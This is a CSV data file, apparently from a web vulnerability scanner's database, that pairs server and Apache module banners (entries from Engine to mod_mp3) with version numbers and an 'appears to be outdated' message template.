"600178","Engine/","1.57","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600179","Enhydra-MultiServer/","3.1.1b1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600180","Entangle/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600181","EnterpriseWeb/","1.1.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600182","ePerl/","2.2.14","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600183","Eplicator/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600184","EPSON-HTTP/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600185","EServ/","3.00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600186","ESMWEBSERVERS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600187","eVisMUX/","6.0.51212128","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600188","EWS-NIC3/","6.31","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600189","EWS-NIC4/","8.43","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600190","Ews/","1.11","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600191","Export/","v2.0-1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600192","exteNdApplicationServer/","100.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600193","ExtraWeb/","4.0.14","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600194","fhttpd/","0.4.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600195","FileMakerPro/","6.0v4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600196","filter/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600197","FireSite/","2.7_PPC","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600198","FirstClass/","8.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600199","FJapache/","6.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600200","fnord-spb/","280604","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600201","fnord/","1.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600202","FooServe/","0.1a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600203","Footprint","4.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600204","FortiWeb-","2.2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600205","FoundryNetworks/","2.20","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600206","fp/","4.0.4.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600207","FPWS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600208","FreezeServer/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600209","Frontier/","9.1b2-MacOSX","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600210","FrontPage-PWS32/","4.0.2.2717","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600211","FrontPage/","5.0.4.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER) (may depend on server version)" "600212","FSID/","M25-8514","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600213","FSPMS/","5.11","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600214","FT::Srv/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600215","FTU/","2.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600216","Fujitsu-InfoProvider-Pro/","6.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600217","Fujitsu-InfoProvider-Pro/V","3.0L20","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600218","Ganesh/","2.2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600219","gettxt/","1.0a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600220","GFE/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600221","GG/","3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600222","giFT-Gnutella/","0.0.10.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600223","glass/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600224","GMSE_Sandcastle/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600225","Gnat-Box/","3.3.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600226","GNNserver/","2.03","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600227","GoAhead-Webs/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600228","GoAhead/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600229","GoGoGadgetWebserver/","0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600230","GordianEmbedded/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600231","GoServe/","2.52","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600232","Ground/","5.3.35","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600233","GTS-Datanet/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600234","GTS/","2.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600235","gtxs/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600236","GUILD/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600237","GWS/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600238","HackersLabWebServer/","7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600239","Hardened-PHP/","5.0.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600240","HavelsanEmbeddedQuix/","18.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600241","Hawkeye/","1.3.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600242","heitml/","2.05","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600243","Hitmatic/","5.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600244","HomeGrownServer/","10.3.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600245","Homepage-Engine/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600246","HP Apache-based Web Server/","1.3.27 (Unix)","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600247","HP Web Jetadmin/","2.0.50","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600248","HP-ChaiServer/","HP-ChaiServer/3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600249","HP-ChaiSOE/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600250","HP-UX_Apache-based_Web_Server/","2.0.48","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600251","Hp-Web-JetAdmin-","5.06.190","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600252","Hp-Web-Server-","3.00.1696","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600253","HPWB/","4.3.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600254","HSP/","2.10.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600255","HTS/","2.99","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600256","HTTP/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600257","HTTPd-WASD/","10.1.1O","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600258","httpd/","2.2.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600259","HTTPlistener/","1.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600260","HTTPS/","0.991","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600261","HttpStk/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600262","Hunn/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600263","HyNetOS/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600264","Hyperwave-Information-Server/","5.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600265","Hyperwave-IS/","6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600266","IBM HTTP Server/","V5R3M0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600267","IBM_HTTP_Server/","7.0.0.17","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600268","IBM-HTTP-Server/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600269","IBM-ICS/","4.2.1.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600270","IBM-PROXY-WTE-US/","7.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600271","IBM-PROXY-WTE/","6f.0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600272","IBMHTTPServer/","V5R3M0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600273","icecast/","icecast/1.3.12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600274","IceWarp/","10.3.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600275","IceWarpWebSrv/","3.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600276","ID/","878810","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600277","IdeaWebServer/","v0.80","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600278","IDS-Server/","4.1.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600279","IgServ/","1.0.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600280","iHTML/","2.20.324","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600281","IIS/","7.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600282","Inc.onz/","VMV4R4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600283","include/","3.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600284","Indy/","10.0.52","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600285","inets/","5.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600286","Infrastructure/","4.0.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600287","Inktomi Search","4.5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600288","Intel NetportExpressPro/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600289","Interaction/","4.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600290","Interambition HTTPd/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600291","InterambitionHTTPd/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600292","InterJet/","3.2.1p16","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600293","InterSpace HTTP Tunneling/","1.01","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600294","InterSpaceFDS/","2.00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600295","InterSpaceHTTPTunneling/","1.01","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600296","Intrusion/","1.0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600297","IPCheck/","5.4.0.796","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600298","IPL/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600299","iPlanet-Enterprise/","4.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600300","iPlanet-Web-Proxy-Server/","3.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600301","iPlanetEnterprise/","4.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600302","ipMonitor ","9.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600303","iPrism-httpd/","v3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600304","Ipswitch-IMail/","8.22","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600305","IpswitchWebCalendaring/","8.12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600306","iPyramid.system/","1.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600307","ISS-PXServer/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600308","iTPSecureWebServer/","4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600309","iTunes/","4.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600310","IXOS-eCON/","5.0A","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600311","J2EE SDK/","1.3.1 (HTTP/1.1 Connector)","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600312","J2EESDK/","1.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600313","JAGeX/","3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600314","JaguarServerVersion/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600315","Jana-Server/","2.4.6.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600316","JanaServer/","2.2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600317","JARING/","10.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600318","java/","1.6.0_06","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600319","JavaHttpServer/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600320","JavaWebServer/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600321","JBoss_","4_0_3_SP1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600322","JC-HTTPD/","1.16.20","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600323","JETServ/","2.2.22","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600324","Jetty","Jetty(8.0.2)","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600325","JeusWebContainer/","Jeus WebContainer/4.2.4.7","RUNNING_VER appears to be outdated (current is at least CURRENT_VER)" "600326","Jigsaw/","2.2.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600327","Joke/","0.9b5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600328","JRun/","4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600329","JRunWebServer/","3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600330","JSP/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600331","JWalkServer/","Version3.3C8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600332","JXAS/","3.0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600333","keyLargo HTTPD ","v1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600334","KK-NET wpp/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600335","KnowNowLiveServer/","2.0.7.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600336","Koalah/","1.3.31","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600337","L series Web/","1.0-beta","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600338","L/","FSV-28-01","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600339","LabVIEW/","5.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600340","LANWeb.I/","v1.82","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600341","Lasso/","8.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600342","Legend-IIS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600343","LePenguin ","0.2a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600344","Liberator/","3.4.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600345","libwww-perl-daemon/","6.01","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600346","lighttpd/","2.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600348","Line-Tap/","3.13","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600349","Linux-Mandrake/","3mdk","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600350","Linux/","11mdk","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600351","LiteSpeed/","2.2.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600352","LittleDutchMoose/","v10.3Build","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600353","LocalDirector/","4.2.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600354","Lotus-Domino/","6.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600355","Lotus-Domino/Release-","4.6.7a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600356","LURHQServer/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600357","LV_HTTP/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600358","M-HTTPD/","2.0.11.3 (Unix) PHP/3.0.12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600359","MacHTTP/","2.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600360","madna/","1.42","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600361","MAIA/","4.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600362","MailSite-HTTPMA/","8.0.5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600363","MakeShop/","1.0.29","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600364","Mandrake Linux/","10.2mdk","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600365","Mark/","1.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600366","Mathopd/","1.6b7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600367","Matsya/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600368","Mediasurface/","4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600369","Meridian Data/","2.1.340","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600370","Meta-HTML/","6.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600371","MGI Server/","1.7.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600372","MHttpd/","4.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600373","Micro-HTTP/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600374","Microsoft_PWS_Mac/","4.0b1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600375","Microsoft-HTTPAPI/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600376","Microsoft-IIS/","7.5","@RUNNING_VER may be outdated (current is at least @CURRENT_VER; IIS 6.0 support is available until 2014)" "600377","Microsoft-Internet-Information-Server/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600378","Microsoft-PWS-95/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600379","Microsoft-PWS/","3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600380","Microsoft-WinCE/","6.00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600381","Midgard/","8.09.6.99","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600382","mini_httpd/","1.1919","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600383","Mini-Proxy/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600384","Mini-Web/","0.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600385","MiniServ/","1.590","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600386","MiniWebSvr/","0.0.9svn","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600387","Minstrel-httpd/","2.0.g","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600388","Miranda Web/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600389","MirandaWeb/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600390","Mirapoint/","3.5.4-GR","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600391","Miwok/","1.618","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600392","mod_accel/","1.0.34","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600393","mod_accessref/","1.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600394","mod_accounting/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600395","mod_adu/","cu_1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600396","mod_advert/","1.12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600397","mod_antihak/","0.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600398","mod_apreq2-20090110/","2.7.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600399","mod_attach/","0.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600400","mod_auth_ascauth/","1.1-Basic","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600401","mod_auth_birdview/","1.00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600402","mod_auth_cutoken/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600403","mod_auth_external/","2.2.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600404","mod_auth_ianus/","3.0.9rc1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600405","mod_auth_inst.c/","19980202","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600406","mod_auth_ip/","1.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600407","mod_auth_kerb/","5.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600408","mod_auth_ldap/","2.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600409","mod_auth_mda/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600410","mod_auth_mysql/","2.20","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600411","mod_auth_nds/","0.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600412","mod_auth_notes/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600413","mod_auth_ns/","0.2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600414","mod_auth_nt/","1.3.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600415","mod_auth_ntdom/","0.4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600416","mod_auth_ora7/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600417","mod_auth_ora8/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600418","mod_auth_oracle/","0.5.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600419","mod_auth_pam_external/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600420","mod_auth_pam/","1.1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600421","mod_auth_passthrough/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600422","mod_auth_pgsql_sys/","0.9.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600423","mod_auth_pgsql/","2.0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600424","mod_auth_pop3/","0.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600425","mod_auth_radius/","1.5.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600426","mod_auth_remote/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600427","mod_auth_shadow/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600428","mod_auth_sspi/","1.0.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600429","mod_auth_tkt/","2.1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600430","mod_authserv_userdir/","asam1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600431","mod_backhand/","1.2.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600432","mod_bandwidth/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600433","mod_become/","1.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600434","mod_bigwig/","2.0-15","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600435","mod_binford/","6100","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600436","mod_blosxom/","0.05","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600437","mod_bluestem/","0.19","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600438","mod_bwlimited/","1.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600439","mod_bwprotect/","0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600440","mod_bwshare/","0.2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600441","mod_cap/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600442","mod_catax/","4.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600443","mod_cgi_sugid/","1.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600444","mod_choke/","0.06","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600445","mod_chroot/","0.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600446","mod_clarassl/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600447","mod_clickthru/","0.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600448","mod_czech/","3.1.1b2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600449","mod_deflate/","1.0.21","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600450","mod_demonstrans/","0.3.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600451","mod_dp/","lk.0.20.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600452","mod_dtcl/","mod_dtcl/0.5.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600453","mod_fastcgi/","2.4.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600454","mod_filter/","1.4.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600455","mod_frontpage/","4.0.4.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600456","mod_gzip/","2.1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600457","mod_id/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600458","mod_imode/","1.0.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600459","mod_index_rss/","1.01","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600460","mod_interchange/","1.29","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600461","mod_ipdrop/","0.01","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600462","mod_ipw/","0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600463","mod_jk/","1.2.36","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600464","mod_jk2/","2.0.5-dev","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600465","Mod_JServ/","1.1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600466","mod_layout/","4.0.1a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600467","mod_ldap_userdir/","1.1.17","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600468","mod_lisp/","2.35","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600469","mod_log_byte/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600470","mod_log_bytes/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600471","mod_loopback/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600472","mod_macro/","1.1.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600473","mod_mcrypt/","2.4.11","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600474","mod_mirror/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600475","mod_mono/","2.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600476","mod_mp3/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" 